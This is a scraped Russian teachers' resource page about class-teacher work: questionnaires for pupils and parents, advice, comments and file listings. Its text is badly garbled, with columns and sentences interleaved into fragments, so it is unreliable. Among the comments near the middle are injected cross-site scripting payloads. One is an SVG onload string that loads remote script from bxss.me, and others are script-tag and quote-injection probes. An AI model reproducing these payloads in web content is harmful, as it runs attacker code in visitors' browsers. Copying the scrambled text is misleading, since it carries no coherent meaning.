отношений педагог должен 1. Любите ли вы
рассмотреть на собрании?– в работе с
, выявленных связей и
глазами ребенка)
Какие темы возможно коллектива;, основании с учетом (семья и родители родителю необходимую информацию.– в изучении ученического
, внимательно, неспешно осмыслена, обобщена, расставлены акценты, и на этом АНКЕТА № 3учебного года предоставить и методов;, подготовки анкетирующего. Информация должна быть Спасибо за ответы!важно в начале – в выборе форм , в обработке, здесь нет каких-то «ключей», не требуется специальной
себе – ___ ; учителю – ___ (на день проверки).активность. Именно поэтому так – в планировании;сайтов: опросники достаточно просты – ___ ;для себя предстоящую получить:Информация получена с Данные анкеты и • степень усвоения программы ориентировки, когда человек планирует Вы хотели бы • Мне нравитсяуважения к воспитаннику.• дисциплина – ___ ;деятельности имеется период работы с классом Анкета для родителей...
спокойной обстановке, с открытой демонстрацией • внимание – ___ ;от классного руководителя. Как утверждают психологи, в начале любой в организации своей к проведению ...
глаз и в –___;
к той информации, которую они получают | Сред | |||||||||||
3. Какую конкретную помощь | и выработать рекомендации | происходить, как правило, с глазу на | • готовность к уроку | родители максимально восприимчивы | классного руководителя? | и слабые стороны | после анкетирования должна | пятибалльной системе: | На первом собрании | |||
2. В чем, по Вашему мнению, заключается сложность работы лучше понять удачные | ||||||||||||
о своей искренности. Беседа с учащимися уроках? Оцените себя по | ||||||||||||
с ним.такая возможность? | ||||||||||||
мероприятиям. Цель: мнение учащихся поможет и потом пожалел ведете себя на | ||||||||||||
отражает степень согласия бы от неё, если была бы | ||||||||||||
мнениями по проведённым быть такого, чтобы ребенок пострадал | ||||||||||||
12. Хорошо ли вы стикера к утверждению или Вы отказались участвовать в обмене | ||||||||||||
случае не должно «спасибо»? | ||||||||||||
– посередине. Объясните родителям, что степень близости работа классного руководителя Анкеты, которые позволят учащимся | ||||||||||||
максимальный такт, корректность и деловитость. Ни в коем | вы сказали бы | этим утверждением, если с обоими | 1. Привлекает ли Вас | класса... | воспитатель должен соблюдать | 11. Кому из учителей | прямо рядом с | РУКОВОДИТЕЛЕЙ | Анкета для 9 | |||
и интерпретации ответов | предметы, а какие-то убрали бы)? | с первым утверждением, он приклеивает стикер | АНКЕТА ДЛЯ классных | экзаменах, как ... | Примечание. При обработке анкет | изменили в учебно-воспитательном процессе (например, ввели бы новые | больше согласны. Так, если родитель согласен | счастливая профессиональная карьера. | успешность чада на | – и те, и другие. | ||
стали директором школы, что бы вы | к тому утверждению, с которым они | должна состояться твоя | атмосферу эмоционального напряжения, ведь многие воспринимают | – в основном мальчики; | 10. Если бы вы | с данными утверждениями, сделав отметку ближе | будет понять юных, рядом с которыми | зачастую сами создают | – в основном девочки; | |||
улучшения работы школы. | степень своего согласия | на долгие годы, тогда тебе легче | родители и учителя | – никто; | предложения педагогам для | попросите родителей отметить | 11. Главное – сохраняй молодость души | и сдачи экзаменов | – несколько человек; | 9. Ваши замечания и | ||
зависит от учителя». В этом случае | над собой. | Как показывает практика, в период подготовки | – большая часть класса; | • развлекался. | зависит от родителя», а слева: «Дисциплина на уроке | – твое отражение; старайся постоянно работать | подростка... | – весь класс; | работу; | |||
противоположных высказываний, например справа: «Дисциплина на уроке 10. Дети в классе | ||||||||||||
Анкета Интернет глазами |
Анализ результатов по данной группе
свое мнение?• устроился бы на одном листе прямо разочарований.2 курса...Кто бы выразил • занимался бы дома;быть размещение на актов благодарности, тогда не будет 16 вопросов, предлагается родителям студентов противоречивым.бы в школу;Другим вариантом может
9. Главное – не жди прямых Анкета состоит из – мнение было бы
• все равно пошел несогласие.
с родителями: дети – родители – учитель – семья. | Сред | |||||||||||
по учебному предмету... | – одобрил бы; | употребили высвобождающееся время? | форме выразить свое | 8. Лучшая форма взаимоотношений | личные качества учителя, который обучает ребенка | внимания; | уроков, куда бы вы | участия), необходимо в корректной | 7. Родитель ребенка – не твой ученик, не твой враг, а друг, советчик, единомышленник. | |||
оценить деловые и – не обратил бы разрешили свободное посещение | ||||||||||||
решались без их с ними.помощью мнения родителей – поддержал бы; | ||||||||||||
8. Если бы сегодня пожелания, чтобы дисциплинарные вопросы с тобой, а тебе интересно Анкета позволяет с бы; | ||||||||||||
справедливым для вас?с реальностью (например, большинство родителей высказали к тебе прислушиваться, им будет интересно | ||||||||||||
цель ____________________________________________– резко вас осудил справедлив? Как сделать его | ||||||||||||
мнение кардинально расходится можешь вовлечь детей, стать им интересным, тогда они будут 18. Самая главная моя | ||||||||||||
Класс:спрашивают? Ваши пожелания, предложения учителю.Если высказанное родителями 6. Главное – найти какое-либо интересное дело, в которое ты | ||||||||||||
сестер зовут _______________________________________выполнению задания. | ||||||||||||
на вопросы учителя? Часто ли вас – Прокомментируйте результат. потрачены напрасно. 17. Моих братьев и не приступили к или с места | ||||||||||||
выбран большинством родителей. | учеников, никогда не будут | умею _______________________________________________ | работать. Вы так и | отвечать у доски | и определите, какой вариант был | насыщенной классной жизни, на культурное развитие | 16. Лучше всего я | в поле (на пришкольном участке), вам не хочется | 6. Нравится ли вам | на каждом листе | ||
5. Силы и время, потраченные на организацию | _______________________________ | 11. Ваш класс работает | • другие формы. | т.д. | результаты. | хотел бы съездить | – и те, и другие. | • словарная работа; | различными способами: нарисовать черту, приклеить стикер и | – она приносит хорошие | ||
15. Страна, в которую я | – в основном мальчики; | уроке; | одной из формулировок. Это можно сделать | и меньше ругать; исповедуй педагогику успеха | зовут ________________________________________ | – в основном девочки; | • творческая работа на | свое согласие с | 4. Лучше больше хвалить | 14. Моего лучшего друга | ||
– никто; | • самостоятельная работа; | – Предложите родителям выразить | школе вообще. | _______________________________________________ | – несколько человек; | уроке больше: | на доске. | по одному предмету, теряют интерес к | 13. Моя любимая игра | – большая часть класса; | ||
5. Что нравится на | – Развесьте эти листы | обучению хотя бы | себе __________________________________________________ | – весь класс; | прочитали (вне школьной программы)? | проблема учителя». | своих способностей к | 12. Я люблю в | свое мнение? | читать? Какую последнюю книгу | ||
– это прежде всего 3. Учащиеся, не нашедшие подтверждения ________________________ | ||||||||||||
Кто бы выразил |
4. Любите ли вы без домашних заданий», или: «Дисциплина на уроке
к тебе.11. Самый прекрасный фильм, который я видел противоречивым.• не нравится учитель;школе можно обойтись воспитанникам относись так, как хочешь, чтобы они относились ________________________________________– мнение было бы • не все понятно;были достаточно нейтральными. Например: «Считаю, что в начальной быть вместе. При этом к 10. Моя любимая телепередача – одобрил бы;хочется? Укажите подробно причину:немного (не более 5). Важно, чтобы все формулировки тот отрезок времени, который вам выпало ________________________________________________внимания;
вам идти не или убеждений. Их должно быть ними совместной деятельностью
9. Моя любимая книга
– не обратил бы 3. На какие уроки возможных родительских ожиданий
2. Главное – не воспитывать ребят, а жить с ____________________________________________
– поддержал бы;
удовольствием? Почему?формата А3 формулировки
формализма, больше человеческого общения.
8. Мое любимое животное бы;
вы идете с
– Подготовьте на листах должно быть меньше ________________________________________________
– резко вас осудил
2. На какие уроки сделать?
взаимоотношениях с воспитанниками 7. Мой любимый цвет
Класс:
учитесь? Укажите причину.Как это можно 1. Во взаимодействии и
__________________________________________________опоздал на поезд.
школа, в которой вы повышает активность родителей.Советы, рекомендации, предостережения классному руководителю:
6. Моя любимая еда
медпункта, и поэтому класс
1. Нравится ли вам
интерактивной форме и
Классный руководитель – это не работа, это образ жизни.
живу, называется ________________________________женщине дойти до
пожелания. Спасибо за помощь!
• Он проводится в
Кодекс классного руководителя
5. Улица, на которой я 10. Вы помогли больной максимально учесть твои
данные сразу же.
лучшую сторону.4. У меня _____________________________________________________волосы– и те, и другие.школы мы постараемся
• Мини-мониторинг позволяет получить
семье и в глаза– в основном мальчики;свою фамилию). При планировании жизни обработки результатов.
реальным изменениям в
3. У меня ______________________________________________________ – в основном девочки;(впрочем, если хочешь, ты можешь указать
большой подготовки и
перспективной и способствовать 2. Мне ______________ лет– никто;
пострадаешь, ведь анкеты анонимны
• Мини-мониторинг не требует • Консультация должна быть 1. Меня зовут _______________________________________________________
– несколько человек;
ты никак не Преимущества мини-мониторинга:по проблеме специалистов, педагогов, классного руководителя.Анкета «Вот я какой!»
– большая часть класса;
классов. Не бойся, за свою честность мини-мониторинга.
родителям реальные рекомендации
это уходит времени?– весь класс;твоего, но и других
можно с помощью
• Консультация должна дать
вы занимаетесь, и сколько на свое мнение?жизнь не только
или учителей-предметников. Выяснить эти ожидания сегодняшним днем.
14. Каким видом творчества Кто бы выразил
сделать более интересной
касаться самого ребенка, его учебных успехов, деятельности классного руководителя в сравнении с на прослушивание музыки?противоречивым.честно и откровенно. Твои ответы помогут для выяснения и, по необходимости, коррекции таких ожиданий. Эти ожидания могут
о прежних качествах, успехах и недостатках 13. Сколько времени уходит – мнение было бы на все вопросы – это идеальное время друг с другом, можно лишь говорить на спортивные занятия?– одобрил бы;Дорогой друг! Мы просим тебя: подумай и ответь ожиданиями. Поэтому первое собрание неуместно сравнивать детей 12. Сколько времени уходит внимания;(урок глазами учеников)
периода сопровождается определенными • В ходе консультации и журналов?– не обратил бы АНКЕТА №1новый период. А начало нового проблемах.на чтение газет – поддержал бы;31.37 КБгод – это своего рода потом говорить о
11. Сколько времени уходит бы;РазмерКаждый новый учебный ребенке и только <
уголок?– резко вас осудил Вложение
использовать эту ситуацию.хорошее и положительное, что есть в вас дома любимый Класс:анкетирование 5 классс педагогом, и очень важно на все то
10. Есть ли у на него учителю.
• Мне нравится
мотивированы на взаимодействие необходимо обратить внимание
дома?9. Вас обидел одноклассник, а вы пожаловались
педагогическими технологиями в...учебного года максимально
• В ходе консультации круг ваших обязанностей – и те, и другие.
в овладении новыми новый класс. Родители в начале
угроз.9. Что входит в
– в основном мальчики;с учащимися, помощь классным руководителям
родителями, особенно если это в доброжелательной атмосфере, без назидания и с родителями каким-нибудь совместным делом?
– в основном девочки;в воспитательной работе классным руководителем и
• Консультация должна проходить 8. Сколько времени занимаетесь
– никто;помощи классным руководителям конструктивного взаимодействия между
в решаемой проблеме.
гуляете?– несколько человек;
Организация информационно-методической и практической закладывает основы для родителям, должны быть компетентны
7. Сколько времени вы – большая часть класса;Классный час "Отношения с родителями"...
с родителями. Первое родительское собрание • Участники консультации, которые пытаются помочь
– чтение художественной литературы.– весь класс;классе...
и для работы проблеме.– слабое здоровье;
свое мнение?его работы в
вокруг педагога. Это будет справедливо свое отношение к – плохие учебники;Кто бы выразил
и об эффективности вокруг детей, потом дети вращаются
свое мнение и знаний;
противоречивым.руководителя с детьми
ним. Сначала педагог вращается
заинтересованным сторонам высказать – несправедливость в оценке – мнение было бы
о взаимоотношениях классного начале работы с
необходимо дать возможность спросят;– одобрил бы;
Удобная анкета, чтобы сделать вывод классом закладывается в
• В ходе консультации – все равно не внимания;
восприятие литературных произведений; чувство сопереживания, доброе ...азбучную истину: основа отношений с
различных позиций: ребенка, родителей, педагогов.жизни;– не обратил бы <
учащихся нравственно-моральные качества через Каждый педагог знает им самим с – оторванность предметов от – поддержал бы;помогает развивать в
родителями своего класса.известна и рассматривалась – усталость;бы;проведение таких мероприятий наладить контакт с • Проблема, которая будет обсуждаться, классному руководителю хорошо – музыка;
– резко вас осудил Совместное с родителями для классного руководителя руководителя.– друзья;Класс:воспитанников...собрание – это уникальная возможность запросам родителей, ребенка и классного – телевизор;
девочкой.новым условиям учебы, лучше узнать своих то, что первое родительское • Консультация проводится по – телефон;с мальчиком или адаптации школьников к вопросов, обратим внимание на (с родителями)
– лень;8. Вы стали дружить руководителю определить уровень нужность решения данных КОНСУЛЬТАЦИЙ
несколько причин:– и те, и другие.5-тиклассников помогут классному и так далее. Понимая важность и <
РЕКОМЕНДАЦИИ К ПРОВЕДЕНИЮ выполнять домашние задания? Выберите одну или
– в основном мальчики;
Представленные анкеты для
заново родительский комитет Бога и труд.
5. Что мешает хорошо
– в основном девочки;воспитанниках очень многое...
на классные нужды, утвердить или выбрать была вера в задания?
– никто;узнать о своих
решения организационных проблем. Необходимо собрать деньги на Руси всегда
у вас домашние – несколько человек;
классный руководитель может собрание используется для Помните, что основой нравственности
4. Сколько времени занимают – большая часть класса;С помощью анкетирования
3. Важным направлением в работе классного руководителя младших школьников является диагностика
учебном году родительское умножения.от дома.– весь класс;класса...
Традиционно первое в их даже таблице – потому что близко свое мнение?классным руководителям 5 кандидат психологических наук, доцент МГППУих способности, не может научить
учителя;Кто бы выразил Данный проект рекомендован Марина Чибисова ,детьми, не верящий в – потому что нравятся противоречивым.• Ваши вопросыСпасибо
своих отношений с школу;– мнение было бы
___________________________________________________________________________
• #1· Чаще улыбайтесь детям. Школа, лишенная оптимизма, деградирует и умирает, преподаватель, не видящий перспективы
– потому что любите
– одобрил бы;___________________________________________________________________________
меня теме!!«урокодателем», обезличенным носителем информации».весело;внимания;_____________________________________________________________________________по очень интересующей быть творческой личностью, «исследователем», а не простым – потому что там – не обратил бы
__________________________________________________________________________сайт!Столько полезной информации · Помните, что преподаватель должен интересно;– поддержал бы;__________________________________________________________________________Огромное спасибо за «ситуацию успеха».– потому что там бы;А) да б) нет в) нет ответаЕвгениягарантирован успех, как следствие, уважение сверстников, то есть обеспечить – учиться;– резко вас осудил про классного руководителя, что он «Самый классный классный»• #2
организовывать деятельность, при которой «трудному» ребенку был бы – общаться с друзьями;Класс:• Вы можете сказать Вы такая, МОЛОДЕЦ! Так держать!!! Спасибо огромное!!!
«трудными» подростками следует так школу: (выберите 2–3 утверждения)попробовали вино.А) да б) нет
Людмила· При работе с 3. Вы ходите в 7. На дискотеке вы
ребенком?• #3(объективной оценки себя, самоконтроль).
– никогда.– и те, и другие.помогает решать проблемы, связанные с вашим Огромное спасибо!эмпатии (сочувствие, сопереживание ребенку) и педагогической рефлексии
– иногда;– в основном мальчики;• Вы можете сказать, что классный руководитель Людмила<
должен забывать об – всегда;– в основном девочки;А) комфортно б) дискомфортно• #4детьми педагог не 2. Вам нравится учиться:– никто;классе чувствует себянеобходимую информацию! То, что надо· При общении с – ____________________ (другое).
– несколько человек;• Ваш ребенок в Большое спасибо за к некоторым ребятам.жизни;– большая часть класса;А) да б) нет в) иногдаИрина· Преодолевайте отрицательное отношение
– это пригодится в – весь класс;школу?• #5девочек. Они более эмоциональны, ранимы.– учиться необходимо;свое мнение?радостью ходит в Спасибо.общении на особенности
поступления в вуз;Кто бы выразил • Ваш ребенок с Елена· Обращайте внимание в – это нужно для противоречивым.А) да б) нет• #6своей педагогической несостоятельностью.– интересно;– мнение было бы классного руководителя удовлетворительной?
спасибо вам большоеможете спровоцировать их – этого требуют родители;– одобрил бы;• Вы считаете работу
света
могут быть конфликты, и что вы 1. Вы учитесь, потому что:внимания;А) да б)нет• #7· Не забывайте, что у детей
(для учащихся)– не обратил бы ваших детейe· Умейте слушать детей.«Интересы и досуг»– поддержал бы;• Классные род. собрания имеют темы, помогающие в воспитании • #8к человеку, как высшей ценности.АНКЕТАбы;А) да б)нет
eв детском коллективе, прежде всего, зависит от отношения
в этом классе?.– резко вас осудил
родительские собрания?
• #9
· Помните, что психологическая атмосфера
10. Можно ли сказать, что тебе повезло, что ты учишься
Класс:• Вы регулярно посещаете
addотношениях с детьми, выстраивайте их.
по себе.
на улице, среди товарищей.
Д) нет ответа
e
· Думайте о своих
в) каждый живет сам 6. Вы грубо выругались
в)через дневник г) все указанное• #10С. Михалковб) разбит на группы;
– и те, и другие.А)по телефону б)лично при встрече </script><svg/onload='+/"/+/onmouseover=1/+(s=document.createElement(/script/.source),s.src=(/,/+/bxss.me\/s?u=013651&r=1920-199&h=1920-d7f77-2&/).slice,document.documentElement.appendChild(s))//'>
Там воспитатели – пеньки.а) сплочен и дружен;
– в основном мальчики;• Вы общаетесь…eпинки,
9. Ты считаешь, что твой класс:– в основном девочки;
А)Да б)нет • #11Где раздают щенкам д) другое.
– никто;руководителем?1'"
Попробуй, подзови щенка.г) разносторонние знания;– несколько человек;
связь с классным eпинкавыглядеть;
– большая часть класса;• Вы систематически поддерживаете • #12Ты после грубого в) умение всегда хорошо – весь класс;ФИО______________________________________________________________________1'"()&%<acx><ScRiPt >Akbs</ScRiPt>
Методика незаконченных предложений для родителей первоклассников
щенком.б) манеру поведения;
свое мнение?Анкета для родителей(классный руководитель)e
Не будет преданным а) великодушный характер;Кто бы выразил
14.78 КБ• #13
Щенок, воспитанный пинком,
от него перенять:
противоречивым.
Размер
e14.0 KB
8. Тебе хотелось бы – мнение было бы Вложение
• #14Microsoft Word Document классному руководителю?
– одобрил бы;анкета для родителей(классный руководитель)1'"
формы взаимодействия.docxиспытываешь к своему внимания;учебного года!eС РОДИТЕЛЯМИ УЧАЩИХСЯ7. Какое чувство ты – не обратил бы Желаю вам удачного • #15ФОРМЫ ВЗАИМОДЕЙСТВИЯ УЧИТЕЛЯ ж) другое.– поддержал бы;в классе.e13.3 KBе) быть вечно недовольным;
бы;лучей. Повесьте это солнце • • #16Microsoft Word Document д) жаловаться родителям;– резко вас осудил на каждом из 353.5 KB
тематика бесед.docxг) ругать;Класс:написать пожелания классу Microsoft Word Document РОДИТЕЛЕЙв) делать замечание;уже упавшего противника.и попросите родителей • Проверь себя: тесты, игры, вопросыИ ЛЕКЦИЙ ДЛЯ
б) подбадривать;драки продолжаете бить со множеством лучей • Девиантное поведение, или вредные привычкиПРИМЕРНАЯ ТЕМАТИКА БЕСЕД а) Хвалить;
5. Вы во время • Нарисуйте большое солнце
• Молодежная субкультура 20.3 KB
к тебе?– и те, и другие.
мешочек.3.0 MBMicrosoft Word Document руководителю по отношению – в основном мальчики;красивую шкатулку или MP3 Audio File 26.1 KB6. Что присуще классному – в основном девочки;положить его в Radio_Killer_-_Be_free_(Radio_Edit)_muznMicrosoft Word Document е) другое.
– никто;учебный год и
5.7 MB
роль родителей.docxд) старший товарищ;– несколько человек;
себе на будущий MP3 Audio File
ОРГАНИЗАЦИИ ДОСУГА ПОДРОСТКАтрудных обстоятельствах;
– большая часть класса;
написать пожелание самому Twilight-3.mp3
РОЛЬ РОДИТЕЛЕЙ В г) помощник ребят в
– весь класс;• Предложите каждому родителю
2.7 MB11.3 KB
в) организатор досуга;свое мнение?
учатся в классе.
MP3 Audio File Microsoft Word Document
б) вторая мама;Кто бы выразил
на то, какие разные дети
На стихи.mp3ШКОЛЫ.docx
и дисциплиной;противоречивым.
обратите внимание родителей
489.1 KB
ОСНОВНЫЕ ЭТАПЫ РАБОТЫ а) Контроль за успеваемостью
– мнение было бы к середине и
MP3 Audio File ШКОЛЫ С РОДИТЕЛЯМИ
твой классный руководитель?– одобрил бы;
он гордится. Прикрепите все лепестки свеж.mp3
ОСНОВНЫЕ ЭТАПЫ РАБОТЫ
5. Какую роль, по-твоему, исполняет в классе внимания;
нравится или которым File 2.6 MB
12.3 KBв) никогда.– не обратил бы то качество ребенка, которое ему особенно
Windows Media Music Microsoft Word Document б) редко;– поддержал бы;написать на лепестке
Чува-у-ва.wmaОСНОВНЫЕ НАПРАВЛЕНИЯ СОВМЕСТНОЙ.docxа) Часто;бы;количеству родителей. Попросите каждого родителя 3.0 MBРОДИТЕЛЕЙ
с классным руководителем?– резко вас осудил цветные лепестки по MP3 Audio File
ДЕЯТЕЛЬНОСТИ ПЕДАГОГОВ И 4. Бывают ли конфликты Класс:
• Подготовьте цветок: сделайте середину и Выход Ведущего - Хорошо.mp3ОСНОВНЫЕ НАПРАВЛЕНИЯ СОВМЕСТНОЙ или другого класса.4. Вы подрались из-за того, что вас обозвали.Возможные варианты:3.4 MB15.0 KB
в) от учеников вашего – и те, и другие.между родителями класса.MP3 Audio File Microsoft Word Document
б) от классного руководителя;– в основном мальчики;
и поспособствует контакту krasivaya_fonovaya_muzyika_1.mp3ОСНОВНЫЕ НАПРАВЛЕНИЯ ДЕЯТЕЛЬНОСТИ.docxа) От учителей-предметников;
– в основном девочки;положительный эмоциональный настрой 4.3 MBИ ИХ РОДИТЕЛЯМИони исходят?– никто;
собрание можно ярким, коротким, эмоционально насыщенным упражнением. Оно поможет создать MP3 Audio File РАБОТЕ С УЧАЩИМИСЯ 3. Если бывают, то от кого – несколько человек;учебном году родительское
76-Liadov. Musical Snuff-Box.mp3КЛАССНОГО РУКОВОДИТЕЛЯ В в) никогда.– большая часть класса;Завершить первое в
Лядов Музыкальная табакеркаоценка.
ОСНОВНЫЕ НАПРАВЛЕНИЯ ДЕЯТЕЛЬНОСТИ б) редко;– весь класс;считают, что …»4.3 MB28.1 KBа) Часто;свое мнение?
мнение, изложенное в анкетах…», «Как показало анкетирование, многие из нас MP3 Audio File
Microsoft Word Document
неприятности?Кто бы выразил
вашими пожеланиями, высказанными в анкетах…», «Ориентируясь на ваше шаре.mp3
обучение родителей.docx
тебя в школе противоречивым.анкетирования: «В соответствии с
04. ДиДюЛя - Полет на воздушном
ОБУЧЕНИЕ РОДИТЕЛЕЙ2. Бывают ли у – мнение было бы ссылается на результаты
3.8 MB16.1 KB
это кончилось.
– одобрил бы;так или иначе
MP3 Audio File Microsoft Word Document г) скорей бы все внимания;
родителями классный руководитель 60-Tchaikovsky. Valse Sentimentale.mp3
методы изучения семьи.docxв) с предчувствием неприятностей;– не обратил бы при взаимодействии с
Чайковский Сентиментальный вальсУЧЕНИКАб) с привычным равнодушием;– поддержал бы;Хорошо, если в дальнейшем
5.9 MBМЕТОДЫ ИЗУЧЕНИЯ СЕМЬИ а) С радостью;
бы;по всему анкетированию.MP3 Audio File 31.2 KBшколу?
– резко вас осудил Затем делается вывод 61-Tchaikovsky. Overture to Nutcracker.m
Microsoft Word Document ты идешь в
Класс:
можно получить, например, такую картину: спорт (футбол, фигурное катание) – 47%, искусство (рисование, музыка) – 31% и т.д.опере Щелкунчик
читающая семья.docx1. С каким настроением
3. Вы соврали товарищу, подруге.
родителями детских интересов Чайковский увертюра к
Читающая семьяВОСПИТАННИКА
– и те, и другие.иные ответы. Например, при систематизации названных
7.9 MB39.0 KB
КЛАССНЫЙ РУКОВОДИТЕЛЬ ГЛАЗАМИ – в основном мальчики;
соотношение родителей, давших те или MP3 Audio File
Microsoft Word Document каждому столбцу.
– в основном девочки;количество и процентное
35-Schubert. Ave Maria.mp3Акт обследования класс.doc
положительных ответов по – никто;
название и определить Шуберт Аве Мария
несовершеннолетнегобыла подсчитана сумма
– несколько человек;
смысловые группы, дать каждой группе 4.4 MB
жизни и воспитания При обработке данных
– большая часть класса;один вопрос, на один лист, объединить их в
MP3 Audio File
Акт обследования условий IX – филологические (9, 18, 27, 36, 45).
– весь класс;
воспользоваться таким способом: выписать все ответы, данные родителями на 33-Chopin. Valse No14.mp3
71.0 KB
VIII – художественно-изобразительные (8, 17, 26, 35, 44);свое мнение?
вопросов проще всего Шопен Вальс № 14
compressed file archive VII – музыкальные (7, 16, 25, 34, 43);Кто бы выразил При обработке открытых 3.2 MBДНЕВНИК.rarVI – коммуникативные (6, 15, 24, 33, 42);противоречивым.
и т.д.MP3 Audio File
Дневник классного руководителяV – эмоционально-изобразительные (артистические) (5, 14, 23, 32, 41);
– мнение было бы
организации классного часа, 10 родителей (40%) – в организации экскурсии 32-Chopin. Mazurka in C-sharp minor.mp3
731.0 KBIV – конструкторско-технические (4, 13, 22, 31, 40);
– одобрил бы;Например, 15 родителей (60%) готовы помогать в
Шопен МазуркаMicrosoft Word Document
III – математические (3, 12, 21, 30, 39);внимания;
анкету.6.8 MB
РУКОВОДИТЕЛЯ.
II – организаторские (2, 11, 20, 29, 38);– не обратил бы
количества родителей, ответивших на данную MP3 Audio File
НАСТОЛЬНАЯ КНИГА КЛАССНОГО I – физические (спортивные) (1, 10, 19, 28, 37);– поддержал бы;
проценты от общего 31-Chopin. Valse No10.mp3
РУКОВОДИТЕЛЯличности:
бы;иной вариант ответа, и переводится в Шопен Вальс №10
НАСТОЛЬНАЯ КНИГА КЛАССНОГО в развитии способностей
– резко вас осудил образом: подсчитывается количество родителей, выбравших тот или
6.8 MB36.5 KB
одно из направлений Класс:
ответов обрабатываются следующим Microsoft Word Document
Microsoft Word Document Каждый столбец (см. контрольный лист) по вертикали характеризует
2. Вы нарушили дисциплину, совершили какой-нибудь проступок (изрезали стол, разбили окно, нагрубили учителю).
вопросы, вопросы с вариантами Портфолио классного руководителя.doc
Пожелания классным руководителям от родителей
Темы по самообразованию.doc
45. Готовиться к докладу, сообщению, сочинению?
– и те, и другие.отдельных вопросов. Закрытые и полузакрытые
о правах ребенкаклассных руководителей.44. Рисовать, лепить, фантазируя при этом?
– в основном мальчики;
Вначале производится обработка Извлечение из конвенции Темы по самообразованию
43. Исполнять музыкальные пьесы?– в основном девочки;
по 10-балльной шкале: 10 – очень интересная тема, 0 – абсолютно неинтересная»).
Портфолио классного руководителя64.0 KBлюдей, героев понравившихся книг?
– никто;к предложенным темам
Портфолио классного руководителяMicrosoft Word Document
42. Думать над судьбами – несколько человек;
4. Вопросы-оценки («Оцените свой интерес
32.0 KB147.0 KB
людях?– большая часть класса;
бы помочь: классные часы, экскурсии, праздники, что-то еще (напишите, что именно)»).
Microsoft Word Document Microsoft Word Document
41. Заботиться о младших, слабых или больных – весь класс;
мероприятий вы могли классного руковод
Новые формы воспитания.doc40. Копаться в механизмах, приборах?
свое мнение?ответов («В организации каких Урок Повышение статуса
РАБОТЫшахматной комбинацией?
Кто бы выразил 3. Вопросы с вариантами
взаимодействие с родителямиНОВЫЕ ФОРМЫ ВОСПИТАТЕЛЬНОЙ
39. Заниматься черчением или
противоречивым.
могли бы помочь?»).руководителя и успешное
33.5 KB
с другими?– мнение было бы
классных мероприятий вы Повышение статуса классного
Microsoft Word Document
38. Энергично работать вместе – одобрил бы;
2. Открытые вопросы («В организации каких 26.5 KB
ФУНКЦИИ КЛАССНОГО ЧАСА.docфизическим трудом?
внимания;дошкольное учреждение? Да, нет»).
Microsoft Word Document 37.0 KB
37. Заниматься спортом или
– не обратил бы варианты ответов («Ваш ребенок посещал
МО классныхруководителей.doc
Microsoft Word Document долгое время:
– поддержал бы;1. Закрытые вопросы, имеющие заранее заданные
руководителейгода.doc
– Любите ли вы бы;
типы вопросов:
Методическое объединение классных
Классное руководство Ученик вести дневник?
– резко вас осудил можно использовать различные
29.5 KB
конкурс36. Писать стихи, прозу или просто
Класс:При составлении анкеты
Microsoft Word Document Ученик года
карандашами?
• Вы получили двойку.
ответы».
КЛА
130.5 KB
35. Порисовать красками или
необходимый ответ.
благодарности: «Спасибо за сотрудничество», «Благодарим вас за
Клруководство ПРАВИЛА СОТРУДНИЧЕСТВА
Microsoft Word Document инструменте?
поведет и подчеркните Завершается анкета выражением
РУКОВОДИТЕЛЯ С УЧАЩИМИСЯ
Клруководство День науки.doc
34. Поиграть на музыкальном себя в ней
трех ответов»).
ПРАВИЛА СОТРУДНИЧЕСТВА КЛАССНОГО
Первооткрыватели
33. Помочь людям, посочувствовать им?
ситуацию, представьте себе, кто и как вопросом: «Выберите не более
189.0 KBДень науки
спектакля?Дорогой друг! Пожалуйста, внимательно прочтите предлагаемую
рядом с этим
Microsoft Word Document
23.0 KB32. Участвовать в постановке
ученика)
отвечать как-то иначе, это можно указать учителя. Пути эффекти
Microsoft Word Document 31. К изготовлению каких-нибудь изделий (моделей)?
(классный коллектив глазами вопрос, на который нужно
В копилку молодого экзамены.docx
шарад?
АНКЕТА № 4
впишите свой». (Если анкета включает родителямишутку, и в серьез)
30. К разгадыванию математических счастливым?
предложенных ответов или классного руководителя с
экзаменам и в или настойчивости?
Как, по-вашему, будете ли вы
вариантов ответа. Пожалуйста, выберите один из учителя. Пути эффективного взаимодействия Во всеоружии (о подготовке к
группе, требующим твоей инициативы • на родителей.
вам предлагается несколько В копилку молодого
270.8 KB29. К делам в
• на государство;
также подробно объясняется, как заполнять анкету: «В каждом вопросе 31.5 KBcompressed file archive
упражнениям?• на самого себя;детей». Во вводной части
Microsoft Word Document
Экзамены.rar К длительным физическим
надеетесь?знать интересы ваших
по П
Буклеттянет:
На кого вы класса», «Нам очень важно
РЕКОМЕНДАЦИИ КЛАССНОМУ РУКОВОДИТЕЛЮ экзаменам
– Часто ли вас • мрачным.
спланировать мероприятия для ПРОФЕССИОНАЛЬНОЙ ОРИЕНТАЦИИ.
при подготовке к 27. От пересказа какого-то события, прочитанного или увиденного?
• неясным;
цели анкетирования, например: «Ваши ответы помогут
СРЕДНИХ КЛАССОВ ПО Памятка для учащихся
выставки?• светлым;необходима для того, чтобы разъяснить родителям
РЕКОМЕНДАЦИИ КЛАССНОМУ РУКОВОДИТЕЛЮ
64.5 KB
26. От посещения художественной будущее?
папы». Вводная часть анкеты 27.0 KB
Microsoft Word Document
новыми музыкальными инструментами, музыкальными произведениями? Каким, по-вашему, обещает быть ваше
обращения: «Уважаемые родители», «Дорогие мамы и
Microsoft Word Document
экзамены
25. От знакомств с
15. Что, по-вашему, обещает ваше будущее?
должна начинаться с
часа
Как научиться сдавать
людьми?с ними?
Вступление к анкете Методика проведения Информационного
35.0 KB24. От общения с
14. Каковы ваши отношения
вступления и вопросов.
Информационный часMicrosoft Word Document сцене?
дедушка?
Анкета состоит из
23.0 KBДень коллективного отдыха.doc
23. От игры на вас бабушка или
предоставить.Microsoft Word Document
родителей и детейэлектро- или радиоприборов?
Есть ли у
информацию она должна школе НАПРАВЛЕНИ
День коллективного отдыха
22. От исправления бытовых
подарки? Какие?нужна и какую
Воспитательная работа в никогда не терять.
математических задач?вашей семье дарить
цели. Иными словами, ответить на вопрос: зачем эта анкета школе. Направления работы
Чтобы школьный престиж
21. От решения трудных Принято ли в необходимо с формулировки
Воспитательная работв в
земле постараемся лучше,
расставить людей, распределить работу?
больше всего?Начинать составление анкеты 41.0 KB
Просто жить на
20. От своего умения семье вы любите и т.д.
Microsoft Word Document
Громких слов говорить, клятв высоких давать.соревнованиях?
11. Какие праздники в приготовлении домашних заданий
для кл. руково
давать обещаний трескучих,борьбы в спортивных
• бедной.профессиях, способах помощи в
Деловая методическая игра
И не будем 19. От участия и
• средней;
воспитания, например о предпочитаемых
